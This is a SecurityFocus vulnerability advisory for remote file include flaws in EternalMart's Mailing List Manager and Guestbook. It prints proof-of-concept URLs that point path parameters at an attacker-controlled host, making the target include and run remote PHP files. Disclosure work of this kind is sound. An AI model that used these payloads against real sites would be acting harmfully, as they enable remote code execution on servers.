Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

EternalMart Multiple Remote File Include Vulnerabilities

The following proof of concept was provided:

Mailing List Manager:

http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php

http://[target]/emml_email_func.php?emml_path=http://[attacker] will
include the file :
http://[attacker]/class.html.mime.mail.php

Guestbook:

http://[target]/admin/auth.php?emgb_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php







 

Privacy Statement
Copyright 2009, SecurityFocus